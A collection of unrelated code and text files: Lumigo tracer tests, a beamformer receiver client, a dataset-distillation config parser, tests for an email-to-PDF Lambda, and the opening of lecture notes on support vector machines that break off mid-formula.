handler = logging.StreamHandler()
logger.addHandler(handler)
try:
1 / 0
except Exception: # You must call the logging.exception method just inside the except part.
logger.exception("hello")
return 1
assert lambda_test_function({}, SimpleNamespace(aws_request_id="1234")) == 1
# Check all lines have exactly one RequestId.
for line in caplog.text.splitlines():
assert line.startswith("RequestId: 1234") and line.count("RequestId: 1234") == 1
# Check the message was logged.
test_message = [line for line in caplog.text.splitlines() if line.endswith("hello")][0].replace(
" ", ""
)
assert "ERROR" in test_message and "hello" in test_message
def test_wrapping_with_logging_override_complex_usage():
@lumigo_tracer(enhance_print=True)
def lambda_test_function(event, context):
handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter("%(name)s [%(levelname)s] %(message)s") # Format of a client.
handler.setFormatter(formatter)
logger = logging.getLogger("my_test")
logger.handlers = [handler]
logger.setLevel("INFO")
logger.info("hello\nworld")
return 1
with CaptureOutput() as capturer:
assert lambda_test_function({}, SimpleNamespace(aws_request_id="1234")) == 1
assert Configuration.enhanced_print is True
assert "RequestId: 1234 my_test [INFO] hello" in capturer.get_lines()
assert "RequestId: 1234 world" in capturer.get_lines()
def test_wrapping_without_logging_override(caplog):
@lumigo_tracer()
def lambda_test_function(event, context):
logging.warning("hello\nworld")
return 1
assert lambda_test_function({}, SimpleNamespace(aws_request_id="1234")) == 1
assert Configuration.enhanced_print is False
assert any(
"RequestId: 1234" not in line and "world" in line for line in caplog.text.split("\n")
)
assert any(
"RequestId: 1234" not in line and "hello" in line for line in caplog.text.split("\n")
)
def test_wrapping_urlib_stream_get():
"""
This is the same case as the one of `requests.get`.
"""
@lumigo_tracer()
def lambda_test_function(event, context):
r = urllib3.PoolManager().urlopen("GET", "https://www.google.com", preload_content=False)
return b"".join(r.stream(32))
lambda_test_function({}, None)
assert len(SpansContainer.get_span().http_spans) == 1
event = SpansContainer.get_span().http_spans[0]
assert event["info"]["httpInfo"]["response"]["body"]
assert event["info"]["httpInfo"]["response"]["statusCode"] == 200
assert event["info"]["httpInfo"]["host"] == "www.google.com"
@pytest.mark.parametrize(
"event, expected_triggered_by, expected_message_id",
[
({}, "unknown", None),
({"result": 1, LUMIGO_EVENT_KEY: {STEP_FUNCTION_UID_KEY: "123"}}, "stepFunction", "123"),
],
)
def test_wrapping_step_function(event, expected_triggered_by, expected_message_id):
@lumigo_tracer(step_function=True)
def lambda_test_function(event, context):
return {"result": 1}
lambda_test_function(event, None)
span = SpansContainer.get_span()
assert len(span.http_spans) == 1
assert span.function_span["info"]["triggeredBy"] == expected_triggered_by
assert span.function_span["info"].get("messageId") == expected_message_id
return_value = json.loads(span.function_span["return_value"])
assert return_value["result"] == 1
assert return_value[LUMIGO_EVENT_KEY][STEP_FUNCTION_UID_KEY]
assert span.http_spans[0]["info"]["httpInfo"]["host"] == "StepFunction"
def test_omitting_keys():
@lumigo_tracer()
def lambda_test_function(event, context):
d = {"a": "b", "myPassword": "<PASSWORD>"}
conn = http.client.HTTPConnection("www.google.com")
conn.request("POST", "/", json.dumps(d))
return {"secret_password": "<PASSWORD>"}
lambda_test_function({"key": "24"}, None)
span = SpansContainer.get_span()
assert span.function_span["return_value"] == '{"secret_password": "****"}'
assert span.function_span["event"] == '{"key": "****"}'
spans = json.loads(_create_request_body(SpansContainer.get_span().http_spans, True))
assert spans[0]["info"]["httpInfo"]["request"]["body"] == json.dumps(
{"a": "b", "myPassword": "****"}
)
def test_can_not_wrap_twice(reporter_mock):
@lumigo_tracer()
@lumigo_tracer()
def lambda_test_function(event, context):
return "ret_value"
result = lambda_test_function({}, SimpleNamespace(aws_request_id="1234"))
assert result == "ret_value"
assert reporter_mock.call_count == 2
def test_wrapping_with_tags():
key = "my_key"
value = "my_value"
@lumigo_tracer()
def lambda_test_function(event, context):
add_execution_tag(key, value)
return "ret_value"
result = lambda_test_function({}, SimpleNamespace(aws_request_id="1234"))
assert result == "ret_value"
assert SpansContainer.get_span().function_span[EXECUTION_TAGS_KEY] == [
{"key": key, "value": value}
]
def test_wrapping_with_tags_for_api_gw_headers(monkeypatch):
set_header_key(monkeypatch, "Accept")
@lumigo_tracer()
def lambda_test_function(event, context):
return "ret_value"
result = lambda_test_function(api_gw_event(), SimpleNamespace(aws_request_id="1234"))
assert result == "ret_value"
assert SpansContainer.get_span().function_span[EXECUTION_TAGS_KEY] == [
{"key": "Accept", "value": "application/json, text/plain, */*"}
]
def test_not_jsonable_return(monkeypatch):
@lumigo_tracer()
def lambda_test_function(event, context):
return {"a": datetime.datetime.now()}
lambda_test_function(api_gw_event(), SimpleNamespace(aws_request_id="1234"))
function_span = SpansContainer.get_span().function_span
assert function_span["return_value"] is None
assert function_span["error"]["type"] == "ReturnValueError"
# following python's runtime: runtime/lambda_runtime_marshaller.py:27
expected_message = 'The lambda will probably fail due to bad return value. Original message: "Object of type datetime is not JSON serializable"'
assert function_span["error"]["message"] == expected_message
def test_correct_headers_of_send_after_request():
@lumigo_tracer()
def lambda_test_function(event, context):
d = {"a": "b", "myPassword": "<PASSWORD>"}
conn = http.client.HTTPConnection("www.google.com")
conn.request("POST", "/", json.dumps(d), headers={"a": b"b"})
conn.send(b"GET\r\nc: d\r\n\r\nbody")
return {"lumigo": "rulz"}
lambda_test_function({"key": "24"}, None)
spans = SpansContainer.get_span().http_spans
assert spans[0]["info"]["httpInfo"]["request"]["headers"] == json.dumps({"a": "b"})
assert spans[1]["info"]["httpInfo"]["request"]["headers"] == json.dumps({"c": "d"})
def set_header_key(monkeypatch, header: str):
monkeypatch.setattr(auto_tag_event, "AUTO_TAG_API_GW_HEADERS", [header])
def api_gw_event() -> Dict:
return {
"resource": "/add-user",
"path": "/add-user",
"httpMethod": "POST",
"headers": {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "he-IL,he;q=0.9,en-US;q=0.8,en;q=0.7",
"Authorization": "auth",
"CloudFront-Forwarded-Proto": "https",
"CloudFront-Is-Desktop-Viewer": "true",
"CloudFront-Is-Mobile-Viewer": "false",
"CloudFront-Is-SmartTV-Viewer": "false",
"CloudFront-Is-Tablet-Viewer": "false",
"CloudFront-Viewer-Country": "IL",
"content-type": "application/json;charset=UTF-8",
"customer_id": "c_1111",
"Host": "aaaa.execute-api.us-west-2.amazonaws.com",
"origin": "https://aaa.io",
"Referer": "https://aaa.io/users",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "cross-site",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36",
"Via": "2.0 59574f77a7cf2d23d64904db278e5711.cloudfront.net (CloudFront)",
"X-Amz-Cf-Id": "J4KbOEUrZCnUQSLsDq1PyYXmfpVy8x634huSeBX0HCbscgH-N2AtVA==",
"X-Amzn-Trace-Id": "Root=1-5e9bf868-1c53a38cfe070266db0bfbd9",
"X-Forwarded-For": "172.16.58.3, 172.16.17.32",
"X-Forwarded-Port": "443",
"X-Forwarded-Proto": "https",
},
"multiValueHeaders": {
"Accept": ["application/json, text/plain, */*"],
"Accept-Encoding": ["gzip, deflate, br"],
"Accept-Language": ["he-IL,he;q=0.9,en-US;q=0.8,en;q=0.7"],
"Authorization": ["auth"],
"CloudFront-Forwarded-Proto": ["https"],
"CloudFront-Is-Desktop-Viewer": ["true"],
"CloudFront-Is-Mobile-Viewer": ["false"],
"CloudFront-Is-SmartTV-Viewer": ["false"],
"CloudFront-Is-Tablet-Viewer": ["false"],
"CloudFront-Viewer-Country": ["IL"],
"content-type": ["application/json;charset=UTF-8"],
"customer_id": ["c_1111"],
"Host": ["a.execute-api.us-west-2.amazonaws.com"],
"origin": ["https://aaa.io"],
"Referer": ["https://aaa.io/users"],
"sec-fetch-dest": ["empty"],
"sec-fetch-mode": ["cors"],
"sec-fetch-site": ["cross-site"],
"User-Agent": [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36"
],
"Via": ["2.0 59574f77a7cf2d23d64904db278e5711.cloudfront.net (CloudFront)"],
"X-Amz-Cf-Id": ["J4KbOEUrZCnUQSLsDq1PyYXmfpVy8x634huSeBX0HCbscgH-N2AtVA=="],
"X-Amzn-Trace-Id": ["Root=1-5e9bf868-1c53a38cfe070266db0bfbd9"],
"X-Forwarded-For": ["172.16.58.3, 172.16.17.32"],
"X-Forwarded-Port": ["443"],
"X-Forwarded-Proto": ["https"],
},
"queryStringParameters": "1",
"multiValueQueryStringParameters": "1",
"pathParameters": "1",
"stageVariables": None,
"requestContext": {
"resourceId": "ua33sn",
"authorizer": {
"claims": {
"sub": "a87005bb-3030-4962-bae8-48cd629ba20b",
"custom:customer": "c_1111",
"iss": "https://cognito-idp.us-west-2.amazonaws.com/us-west-2",
"custom:customer-name": "a",
"cognito:username": "aa",
"aud": "4lidcnek50hi18996gadaop8j0",
"event_id": "9fe80735-f265-41d5-a7ca-04b88c2a4a4c",
"token_use": "id",
"auth_time": "1587038744",
"exp": "Sun Apr 19 08:06:14 UTC 2020",
"custom:role": "admin",
"iat": "Sun Apr 19 07:06:14 UTC 2020",
"email": "<EMAIL>",
}
},
"resourcePath": "/add-user",
"httpMethod": "POST",
"extendedRequestId": "LOPAXFcuvHcFUKg=",
"requestTime": "19/Apr/2020:07:06:16 +0000",
"path": "/prod/add-user",
"accountId": "114300393969",
"protocol": "HTTP/1.1",
"stage": "prod",
"domainPrefix": "psqn7b0ev2",
"requestTimeEpoch": 1587279976628,
"requestId": "78542821-ca17-4e83-94ec-96993a9d451d",
"identity": {
"cognitoIdentityPoolId": None,
"accountId": None,
"cognitoIdentityId": None,
"caller": None,
"sourceIp": "172.16.58.3",
"principalOrgId": None,
"accessKey": None,
"cognitoAuthenticationType": None,
"cognitoAuthenticationProvider": None,
"userArn": None,
"userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36",
"user": None,
},
"domainName": "psqn7b0ev2.execute-api.us-west-2.amazonaws.com",
"apiId": "psqn7b0ev2",
},
"body": '{"email":"<EMAIL>"}',
"isBase64Encoded": False,
}
|
"""
Client for communicating with the beamformer receiver on kat-dc2.karoo
Author: <NAME>
Date: 2014-01-03
Modified:
"""
from katcp import *
import logging
log = logging.getLogger("katcp")
class FBFClient(BlockingClient):
# class FBFClient(CallbackClient):
"""Client for communicating Beamformer receiver
Notes:
- All commands are blocking.
- If there is no response to an issued command, an exception is thrown
with appropriate message after a timeout waiting for the response.
- If the TCP connection dies, an exception is thrown with an
appropriate message.
"""
def __init__(self, host, port=7147, tb_limit=20, timeout=10.0, logger=log):
"""Create a basic DeviceClient.
@param self This object.
@param host String: host to connect to.
@param port Integer: port to connect to.
@param tb_limit Integer: maximum number of stack frames to
send in error traceback.
@param timeout Float: seconds to wait before timing out on
client operations.
@param logger Object: Logger to log to.
"""
super(FBFClient, self).__init__(host, port, tb_limit=tb_limit,timeout=timeout, logger=logger)
self.host=host
self._timeout = timeout
#self.start(daemon=True)
self.start()
print "IT's CHRIS!"
def inform_log(self,message):
"If we get a log inform, log it."
DeviceLogger.log_to_python(self._logger, message)
def _request(self, name, *args):
"""Make a blocking request and check the result.
Raise an error if the reply indicates a request failure.
@param self This object.
@param name String: name of the request message to send.
@param args List of strings: request arguments.
@return Tuple: containing the reply and a list of inform messages.
"""
request = Message.request(name, *args)
timeout=3600.0 # Nr of seconds to wait before timing out on client operation
reply, informs = self.blocking_request(request, timeout = timeout, keepalive=True)
# reply, informs = self.blocking_request(request,keepalive=True)
if reply.arguments[0] != Message.OK:
self._logger.error("Request %s failed.\n Request: %s\n Reply: %s."
% (request.name, request, reply))
raise RuntimeError("Request %s failed.\n Request: %s\n Reply: %s."
% (request.name, request, reply))
return reply, informs
def rx_init(self, prefix, halfband=False, transpose=False):
"""Initialise beamformer receiver and set up environment variables for capture
@param self This object.
@param prefix String: Data output directory
@param halfband Boolean: [Optional]Set to record only inner 50% of the band
@param transpose Boolean: [Optional]Set to transpose time frequency blocks
@return Boolean: Reply message indicating success.
"""
try: reply, informs = self._request("rx-init", prefix, int(not halfband), int(transpose))
except: raise
if reply.arguments[0]=='ok': return True
else: return False
def rx_close(self):
"""Closing beamformer receiver
@param self This object.
@return String: Directory name where captured data is housed
"""
reply, informs = self._request("rx-close")
if reply.arguments[0]=='ok':
return reply.arguments[-1]
else: raise RuntimeError('Cannot move output directory, verify data in PREFIX directory')
def rx_meta_init(self, port):
"""Start the receiver to capture beamformer meta data
@param self This object.
@param port String: Selected port to output metadata
@return String: Metadata output port used
"""
reply, informs = self._request("rx-meta-init", int(port))
if reply.arguments[0]=='ok': return str(informs[0]).split()[-1].replace('\_'," ")
def rx_meta(self, meta_dict=None):
"""Capture beamformer meta data after transmit has started
@param self This object.
@param meta_dict Dictionary: Observation specific metadata # temp fix until augmentation of beamformer data
@return Boolean: Reply message indicating success.
"""
meta_str = ''
if meta_dict is not None:
for key in meta_dict.keys():
meta_str += ('%s: %s;' % (key, str(meta_dict[key])))
reply, informs = self._request("rx-meta", meta_str)
if reply.arguments[0]=='ok': return True
else: raise RuntimeError('Failure to capture meta data')
def rx_beam(self, pol='h', port='7150'):
"""Capture beamformer data
@param self This object.
@param pol String: Polarization associated with beam
@param port String: Selected port to output metadata
@return String: Data output port used
"""
reply, informs = self._request("rx-beam", int(port), pol)
if reply.arguments[0]=='ok': return str(informs[0]).split()[-1].replace('\_'," ")
def rx_stop(self):
"""Safely stops all SPEAD receivers and tear down client connections
@param self This object.
@return String: Data output port used
"""
reply, informs = self._request("rx-stop")
if reply.arguments[0]=='ok': return str(informs[0]).split()[-1].replace('\_'," ")
# -fin-
|
<reponame>Ahmedjjj/dataset-distillation<filename>fed_distill/config/parser.py
from typing import Iterable, Optional, Tuple, Union
import numpy as np
from omegaconf import DictConfig
from torch import nn
from torch.utils.data import Dataset
from torchvision.datasets import CIFAR10
import torch
from fed_distill.cifar10 import (inversion_transform, test_transform,
train_transform)
from fed_distill.deep_inv import DeepInversion, DeepInversionLoss
from fed_distill.deep_inv.sampler import (BalancedSampler, RandomSampler,
TargetSampler, WeightedSampler)
from fed_distill.fed import HeterogenousDistribution
from fed_distill.resnet import ResNet18
class _Parser(object):
_optimizer_to_class = {"sgd": torch.optim.SGD, "adam": torch.optim.Adam}
class _WorkerParser(_Parser):
_scheduler_to_class = {"multistep_lr": torch.optim.lr_scheduler.MultiStepLR}
_model_to_class = {"resnet18": ResNet18}
def __init__(self, cfg: DictConfig, device: str) -> None:
self._cfg = cfg
self._device = device
def model(self) -> nn.Module:
cfg = self._cfg.model
model = self._model_to_class[cfg.name]
return model(**cfg.params).to(self._device)
def optimizer(self, params: Iterable[torch.Tensor]) -> torch.optim.Optimizer:
cfg = self._cfg.optimizer
return self._optimizer_to_class[cfg.name](params, **cfg.params)
def scheduler(self, optimizer: torch.optim.Optimizer):
cfg = self._cfg.scheduler
return self._scheduler_to_class[cfg.name](optimizer, **cfg.params)
class StudentParser(_WorkerParser):
def __init__(self, cfg: DictConfig, device: str = "cuda") -> None:
super().__init__(cfg.student, device)
class TeacherParser(_WorkerParser):
def __init__(self, cfg: DictConfig, device: str = "cuda") -> None:
super().__init__(cfg.teacher, device)
class DatasetParser(_Parser):
_dataset_to_class = {"cifar10": CIFAR10}
_dataset_to_transforms = {"cifar10": (train_transform, test_transform)}
def _restrict_dataset(self, dataset, classes) -> Dataset:
indices = np.argwhere(np.in1d(dataset.targets, classes)).flatten()
subset = torch.utils.data.Subset(dataset, indices)
subset.targets = np.array(dataset.targets)[indices]
return subset
def __init__(self, cfg: DictConfig) -> None:
self._cfg = cfg.dataset
def dataset(
self, train: Optional[bool] = None
) -> Union[Dataset, Tuple[Dataset, Dataset]]:
dataset_class = self._dataset_to_class[self._cfg.name]
train_transform, test_transform = self._dataset_to_transforms[self._cfg.name]
train_dataset = dataset_class(
train=True, transform=train_transform, **self._cfg.train_params
)
test_dataset = dataset_class(
train=False, transform=test_transform, **self._cfg.test_params
)
if "classes" in self._cfg:
train_dataset = self._restrict_dataset(train_dataset, self._cfg.classes)
test_dataset = self._restrict_dataset(test_dataset, self._cfg.classes)
if train is None:
return train_dataset, test_dataset
elif train:
return train_dataset
else:
return test_dataset
class FederatedParser(_Parser):
_splitter_to_class = {"heter": HeterogenousDistribution}
def __init__(self, cfg: DictConfig) -> None:
self._cfg = cfg.splitter
def splitter(self):
return self._splitter_to_class[self._cfg.name](**self._cfg.params)
class DeepInversionParser(_Parser):
_dataset_to_di_transform = {"cifar10": inversion_transform}
def __init__(self, cfg: DictConfig) -> None:
self._cfg = cfg
def loss(self, classes=None) -> DeepInversionLoss:
return DeepInversionLoss(**self._cfg.deep_inv.loss, classes=classes)
def optimizer(self):
batch_size = self._cfg.student.training.batch_size
input_shape = self._cfg.dataset.input_shape
inputs = torch.zeros(
(batch_size, *input_shape), requires_grad=True, device="cuda"
)
optimizer_cfg = self._cfg.deep_inv.optimizer
return self._optimizer_to_class[optimizer_cfg.name](
[inputs], **optimizer_cfg.params
)
def transform(self):
return self._dataset_to_di_transform[self._cfg.dataset.name]
def sampler(self, targets=None) -> TargetSampler:
batch_size = self._cfg.student.training.batch_size
label_sampler = self._cfg.student.label_sampler.type
if label_sampler == "random":
return RandomSampler(batch_size, targets)
elif label_sampler == "weighted":
return WeightedSampler(batch_size, targets)
elif label_sampler == "balanced":
return BalancedSampler(batch_size, targets)
else:
raise NotImplementedError()
def deep_inversion(self, loss, sampler):
return DeepInversion(
loss=loss,
sampler=sampler,
optimizer=self.optimizer(),
grad_updates_batch=self._cfg.deep_inv.gradient_updates,
input_jitter=self._cfg.deep_inv.jitter,
)
class ConfigParser(_Parser):
def __init__(self, cfg: DictConfig) -> None:
self._student = StudentParser(cfg)
self._teacher = TeacherParser(cfg)
self._federated = FederatedParser(cfg)
self._deep_inv = DeepInversionParser(cfg)
self._dataset = DatasetParser(cfg)
@property
def student(self):
return self._student
@property
def teacher(self):
return self._teacher
@property
def deep_inv(self):
return self._deep_inv
@property
def fed(self):
return self._federated
@property
def dataset(self):
return self._dataset
|
<filename>test_extract_pdf.py<gh_stars>10-100
import pytest
from unittest.mock import MagicMock, patch
import email
from users import UserModel
import lambda_main
class MockUserModel(UserModel):
def exists(self):
return True
def create_table(self, wait=True):
return True
mock_register_user = MagicMock(return_value=True)
mock_send_email = MagicMock()
mock_delete_user = MagicMock(return_value=True)
@pytest.fixture(autouse=True)
def mock_lambdamain(monkeypatch):
monkeypatch.setattr(lambda_main, "register_user", mock_register_user)
monkeypatch.setattr(lambda_main, "send_email_if_enabled", mock_send_email)
monkeypatch.setattr(lambda_main, "delete_user", mock_delete_user)
@pytest.fixture
def message_with_one_attachment():
"""
Pytest fixture
"""
with open("./test_data/pdf_one_email.eml", "rb") as f:
message = email.message_from_binary_file(f)
return message
@pytest.fixture
def message_with_epub_attachment():
with open("./test_data/epub_email.eml", "rb") as f:
message = email.message_from_binary_file(f)
return message
@pytest.fixture
def message_with_multiple_attachments():
with open("./test_data/multiple_emails.eml", "rb") as f:
message = email.message_from_binary_file(f)
return message
@pytest.fixture
def message_with_code():
"""
Pytest fixture
"""
with open("./test_data/code_email.eml", "rb") as f:
message = email.message_from_binary_file(f)
return message
@pytest.fixture
def regular_message():
"""
Pytest fixture for regular email
(not a code, not an unsubscribe, no attachment)
"""
with open("./test_data/regular_email.eml", "rb") as f:
message = email.message_from_binary_file(f)
return message
@pytest.fixture
def unsubscribe_message():
"""
Pytest fixture for unsubscribe email
"""
with open("./test_data/unsubscribe_email.eml", "rb") as f:
message = email.message_from_binary_file(f)
return message
@pytest.fixture
def test_pdf():
"""
Returns the binary data of test_pdf.pdf
for testing purposes
"""
with open("./test_data/test_pdf.pdf", "rb") as pdff:
return pdff.read()
@pytest.fixture
def test_epub():
"""
Returns the binary data of test_pdf.epub
for testing purposes
"""
# FIXME
with open("./test_data/test_pdf.epub", "rb") as epub:
return epub.read()
def test_extract_pdf_code(message_with_code):
"""
Tests that the extract_pdf function in lambda_main
succesfully registers a new user,
emails the user to confirm, and
successfully returns (False, False)
when given an email with a 8-digit code as subject.
"""
filename, filebytes = lambda_main.extract_pdf(message_with_code)
assert (filename, filebytes) == (False, False)
mock_register_user.assert_called_with("<NAME> <<EMAIL>>", "ABCD1234")
mock_send_email.assert_called_with(
"<NAME> <<EMAIL>>",
subject="Your email address is now verified!",
message="Your verification succeeded, and you can now email documents to your reMarkable tablet. Try responding to this email with a PDF attachment!",
)
def test_extract_pdf_single_pdf(message_with_one_attachment, test_pdf):
"""
Tests that the extract_pdf function in lambda_main
successfully returns the file name and binary data of
test_pdf.pdf when it is attached in an email.
"""
filename, filebytes = lambda_main.extract_pdf(message_with_one_attachment)
assert (filename, filebytes) == ("test_pdf.pdf", test_pdf)
def test_extract_pdf_no_pdf(regular_message):
filename, filebytes = lambda_main.extract_pdf(regular_message)
assert (filename, filebytes) == (False, False)
mock_send_email.assert_called_with(
"<NAME> <<EMAIL>>",
subject="A problem with your document :(",
message="Unfortunately, a problem occurred while processing your email. Remailable only supports PDF attachments for now. If you're still encountering issues, please get in touch with Jordan at <EMAIL> or on Twitter at @j6m8.",
)
def test_extract_pdf_unsubscribe(unsubscribe_message):
filename, filebytes = lambda_main.extract_pdf(unsubscribe_message)
assert (filename, filebytes) == (False, False)
mock_delete_user.assert_called_once_with(
"<NAME> <<EMAIL>>",
)
def test_extract_files_from_email_unsubscribe(unsubscribe_message):
result = lambda_main.extract_files_from_email(unsubscribe_message)
assert result == lambda_main.ParseMessageResult(
sent_from="<NAME> <<EMAIL>>",
status=lambda_main.MessageStatus.UNSUBSCRIBE,
subject="Please Unsubscribe Me",
extracted_files=[]
)
def test_extract_files_from_email_register(message_with_code):
result = lambda_main.extract_files_from_email(message_with_code)
assert result == lambda_main.ParseMessageResult(
sent_from="<NAME> <<EMAIL>>",
status=lambda_main.MessageStatus.REGISTER,
subject="ABCD1234",
extracted_files=[]
)
def test_extract_files_from_email_pdf(message_with_one_attachment, test_pdf):
result = lambda_main.extract_files_from_email(message_with_one_attachment)
assert result == lambda_main.ParseMessageResult(
sent_from="<NAME> <<EMAIL>>",
status=lambda_main.MessageStatus.SUCCESS,
subject="Re: Test email with test PDF",
extracted_files=[("test_pdf.pdf", test_pdf)]
)
def test_extract_files_from_email_epub(message_with_epub_attachment, test_epub):
result = lambda_main.extract_files_from_email(message_with_epub_attachment)
assert result["sent_from"] == "<NAME> <<EMAIL>>"
assert result["status"] == lambda_main.MessageStatus.SUCCESS
assert result["subject"] == "Email with an EPUB attachment"
assert result["extracted_files"] == [("test_pdf.epub", test_epub)]
def test_extract_files_from_email_multiple(message_with_multiple_attachments, test_epub, test_pdf):
result = lambda_main.extract_files_from_email(message_with_multiple_attachments)
assert result["sent_from"] == "<NAME> <<EMAIL>>"
assert result["status"] == lambda_main.MessageStatus.SUCCESS
assert result["subject"] == "An email with multiple files"
assert sorted(result["extracted_files"]) == sorted([("test_pdf.epub", test_epub), ("test_pdf.pdf", test_pdf)]
)
def test_extract_files_from_email_error(message_with_one_attachment, test_pdf):
# TODO
assert True
|
# Support Vector Machines
## Introduction
A Support Vector Machine (SVM) is a very powerful and versatile
Machine Learning method, capable of performing linear or nonlinear
classification, regression, and even outlier detection. It is one of
the most popular models in Machine Learning, and anyone interested in
Machine Learning should have it in their toolbox. SVMs are
particularly well suited for classification of complex but small-sized or
medium-sized datasets.
The case with two well-separated classes only can be understood in an
intuitive way in terms of lines in a two-dimensional space separating
the two classes (see figure below).
The basic mathematics behind the SVM is however less familiar to most of us.
It relies on the definition of hyperplanes and the
definition of a **margin** which separates classes (in case of
classification problems) of variables. It is also used for regression
problems.
With SVMs we distinguish between hard margin and soft margins. The
latter introduces a so-called softening parameter to be discussed
below. We distinguish also between linear and non-linear
approaches. The latter are the most frequent ones since it is rather
unlikely that we can separate classes easily by say straight lines.
## Hyperplanes and all that
The theory behind support vector machines (SVM hereafter) is based on
the mathematical description of so-called hyperplanes. Let us start
with a two-dimensional case. This will also allow us to introduce our
first SVM examples. These will be tailored to the case of two specific
classes, as displayed in the figure here based on the usage of the petal data.
We assume here that our data set can be well separated into two
domains, where a straight line does the job in the separating the two
classes. Here the two classes are represented by either squares or
circles.
%matplotlib inline
from sklearn import datasets
from sklearn.svm import SVC, LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn.preprocessing import StandardScaler
import matplotlib
import matplotlib.pyplot as plt
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
iris = datasets.load_iris()
X = iris["data"][:, (2, 3)] # petal length, petal width
y = iris["target"]
setosa_or_versicolor = (y == 0) | (y == 1)
X = X[setosa_or_versicolor]
y = y[setosa_or_versicolor]
C = 5
alpha = 1 / (C * len(X))
lin_clf = LinearSVC(loss="hinge", C=C, random_state=42)
svm_clf = SVC(kernel="linear", C=C)
sgd_clf = SGDClassifier(loss="hinge", learning_rate="constant", eta0=0.001, alpha=alpha,
max_iter=100000, random_state=42)
scaler = StandardScaler()
X_scaled = scaler.fit_transform(X)
lin_clf.fit(X_scaled, y)
svm_clf.fit(X_scaled, y)
sgd_clf.fit(X_scaled, y)
print("LinearSVC: ", lin_clf.intercept_, lin_clf.coef_)
print("SVC: ", svm_clf.intercept_, svm_clf.coef_)
print("SGDClassifier(alpha={:.5f}):".format(sgd_clf.alpha), sgd_clf.intercept_, sgd_clf.coef_)
# Compute the slope and bias of each decision boundary
w1 = -lin_clf.coef_[0, 0]/lin_clf.coef_[0, 1]
b1 = -lin_clf.intercept_[0]/lin_clf.coef_[0, 1]
w2 = -svm_clf.coef_[0, 0]/svm_clf.coef_[0, 1]
b2 = -svm_clf.intercept_[0]/svm_clf.coef_[0, 1]
w3 = -sgd_clf.coef_[0, 0]/sgd_clf.coef_[0, 1]
b3 = -sgd_clf.intercept_[0]/sgd_clf.coef_[0, 1]
# Transform the decision boundary lines back to the original scale
line1 = scaler.inverse_transform([[-10, -10 * w1 + b1], [10, 10 * w1 + b1]])
line2 = scaler.inverse_transform([[-10, -10 * w2 + b2], [10, 10 * w2 + b2]])
line3 = scaler.inverse_transform([[-10, -10 * w3 + b3], [10, 10 * w3 + b3]])
# Plot all three decision boundaries
plt.figure(figsize=(11, 4))
plt.plot(line1[:, 0], line1[:, 1], "k:", label="LinearSVC")
plt.plot(line2[:, 0], line2[:, 1], "b--", linewidth=2, label="SVC")
plt.plot(line3[:, 0], line3[:, 1], "r-", label="SGDClassifier")
plt.plot(X[:, 0][y==1], X[:, 1][y==1], "bs") # label="Iris-Versicolor"
plt.plot(X[:, 0][y==0], X[:, 1][y==0], "yo") # label="Iris-Setosa"
plt.xlabel("Petal length", fontsize=14)
plt.ylabel("Petal width", fontsize=14)
plt.legend(loc="upper center", fontsize=14)
plt.axis([0, 5.5, 0, 2])
plt.show()
### What is a hyperplane?
The aim of the SVM algorithm is to find a hyperplane in a
$p$-dimensional space, where $p$ is the number of features that
distinctly classifies the data points.
In a $p$-dimensional space, a hyperplane is what we call an affine subspace of dimension of $p-1$.
As an example, in two dimension, a hyperplane is simply as straight line while in three dimensions it is
a two-dimensional subspace, or stated simply, a plane.
In two dimensions, with the variables $x_1$ and $x_2$, the hyperplane is defined as
$$
b+w_1x_1+w_2x_2=0,
$$
where $b$ is the intercept and $w_1$ and $w_2$ define the elements of a vector orthogonal to the line
$b+w_1x_1+w_2x_2=0$.
In two dimensions we define the vectors $\boldsymbol{x} =[x1,x2]$ and $\boldsymbol{w}=[w1,w2]$.
We can then rewrite the above equation as
$$
\boldsymbol{x}^T\boldsymbol{w}+b=0.
$$
We limit ourselves to two classes of outputs $y_i$ and assign these classes the values $y_i = \pm 1$.
In a $p$-dimensional space of say $p$ features we have a hyperplane defines as
$$
b+wx_1+w_2x_2+\dots +w_px_p=0.
$$
If we define a
matrix $\boldsymbol{X}=\left[\boldsymbol{x}_1,\boldsymbol{x}_2,\dots, \boldsymbol{x}_p\right]$
of dimension $n\times p$, where $n$ represents the observations for each feature and each vector $x_i$ is a column vector of the matrix $\boldsymbol{X}$,
$$
\boldsymbol{x}_i = \begin{bmatrix} x_{i1} \\ x_{i2} \\ \dots \\ \dots \\ x_{ip} \end{bmatrix}.
$$
If the above condition is not met for a given vector $\boldsymbol{x}_i$ we have
$$
b+w_1x_{i1}+w_2x_{i2}+\dots +w_px_{ip} >0,
$$
if our output $y_i=1$.
In this case we say that $\boldsymbol{x}_i$ lies on one of the sides of the hyperplane and if
$$
b+w_1x_{i1}+w_2x_{i2}+\dots +w_px_{ip} < 0,
$$
for the class of observations $y_i=-1$,
then $\boldsymbol{x}_i$ lies on the other side.
Equivalently, for the two classes of observations we have
$$
y_i\left(b+w_1x_{i1}+w_2x_{i2}+\dots +w_px_{ip}\right) > 0.
$$
When we try to separate hyperplanes, if it exists, we can use it to construct a natural classifier: a test observation is assigned a given class depending on which side of the hyperplane it is located.
## The two-dimensional case
Let us try to develop our intuition about SVMs by limiting ourselves to a two-dimensional
plane. To separate the two classes of data points, there are many
possible lines (hyperplanes if you prefer a more strict naming)
that could be chosen. Our objective is to find a
plane that has the maximum margin, i.e the maximum distance between
data points of both classes. Maximizing the margin distance provides
some reinforcement so that future data points can be classified with
more confidence.
What a linear classifier attempts to accomplish is to split the
feature space into two half spaces by placing a hyperplane between the
data points. This hyperplane will be our decision boundary. All
points on one side of the plane will belong to class one and all points
on the other side of the plane will belong to the second class two.
Unfortunately there are many ways in which we can place a hyperplane
to divide the data. Below is an example of two candidate hyperplanes
for our data sample.
Let us define the function
$$
